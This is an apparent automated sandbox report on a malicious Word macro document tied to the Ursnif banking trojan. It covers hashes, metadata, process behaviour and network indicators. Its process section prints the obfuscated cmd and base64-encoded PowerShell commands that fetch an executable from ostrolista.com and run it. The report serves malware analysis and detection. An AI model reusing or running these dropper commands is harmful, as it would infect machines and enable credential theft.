analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Neighborhood.doc

Full analysis: https://app.any.run/tasks/6e269289-a32b-48f7-98f2-d11c82476b56
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: November 08, 2018, 18:27:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
gozi
ursnif
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Multi-channelled transitional leverage, Subject: Oklahoma Torrey, Author: 1-321-718-2285 x774, Comments: Monitored zero defect methodology, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Nov 8 07:44:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

3BC286C00B4888853CC5F7A30D0E63C6

SHA1:

F31155687987ACE4D9F547E069789645680D7272

SHA256:

A00C8000158A7BDC58B66751053DA97A49959D7F01151379A61A6BE1A6DFC307

SSDEEP:

1536:bl5ztPLfb1MIjd1GO/WWATRE2lwA7YLymzDT3C2Rr9R5e1dB:zBLT7PfWW87SACjXDeHB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • URSNIF was detected

      • powershell.exe (PID: 3828)
    • Executes PowerShell scripts

      • CMd.eXe (PID: 2180)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3556)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3556)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3828)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3556)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3556)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 101888
Company: Eichmann, Carroll and Olson Quinton McKenzie
Manager: Kristoffer Kirlin
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:08 07:44:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 2.0 minutes
Software: Microsoft Office Word
RevisionNumber: 10
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: Monitored zero defect methodology
Keywords: -
Author: 1-321-718-2285 x774
Subject: Oklahoma Torrey
Title: Multi-channelled transitional leverage
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3556"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Neighborhood.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2180CMd.eXe /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^M^A^d^A^B^y^A^G^8^A^b^A^B^p^A^H^M^A^d^A^B^h^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^X^A^E^U^A^U^w^A^v^A^G^Y^A^Y^Q^B^0^A^G^8^A^Z^w^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^w^A^Z^Q^B^k^A^G^8^A^N^w^A^u^A^H^g^A^Y^Q^B^w^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^B^i^A^G^Y^A^M^w^A^2^A^D^g^A^M^w^A^0^A^G^E^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^A^g^A^F^M^A^d^A^B^h^A^H^I^A^d^A^A^t^A^F^A^A^c^g^B^v^A^G^M^A^Z^Q^B^z^A^H^M^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^o^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^n^A^F^w^A^Y^g^B^m^A^D^M^A^N^g^A^4^A^D^M^A^N^A^B^h^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^=C:\Windows\system32\CMd.eXeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3828poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBvAHMAdAByAG8AbABpAHMAdABhAC4AYwBvAG0ALwBXAEUAUwAvAGYAYQB0AG8AZwAuAHAAaABwAD8AbAA9AGwAZQBkAG8ANwAuAHgAYQBwACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABiAGYAMwA2ADgAMwA0AGEALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAYgBmADMANgA4ADMANABhAC4AZQB4AGUAJwA7ACAARQB4AGkAdAA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMd.eXe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 339
Read events
941
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99BB.tmp.cvr
MD5:
SHA256:
3828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1OE4YW7AX9T4MDHPUAQC.temp
MD5:
SHA256:
3556WINWORD.EXEC:\Users\admin\Downloads\~$ighborhood.docpgc
MD5:35708D912C8314391794EFEF5F11C6B6
SHA256:C7CD36BB52AA47E3568B59F98B0130B17A50E7304E077ABE3622D0159F29A21D
3828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da5b1.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3556WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:B1A7C88B7305CC4062EEF4B136754690
SHA256:F352B1C226772AAAE814ED4DE359FD62C380307DE8E4CDD6870909842C4DE8DA
3556WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6478BB2BE174A0FAE47651F23B2C4452
SHA256:025B9E3046928A955FDA3935A5483CC0B699DF89B0A57EFA6407F35FD955B1BF
3556WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Neighborhood.doc.LNKlnk
MD5:D05DC1DE3F5C1C6588542EC927D4BE60
SHA256:DC76F07A1AD44D42D7F4C1F6E02008F1A359DE2CC2DAEF7635386D6531EBFAC2
3828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3828
powershell.exe
GET
185.159.128.78:80
http://ostrolista.com/WES/fatog.php?l=ledo7.xap
RU
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3828
powershell.exe
185.159.128.78:80
ostrolista.com
IT Outsourcing LLC
RU
suspicious

DNS requests

Domain
IP
Reputation
ostrolista.com
  • 185.159.128.78
suspicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info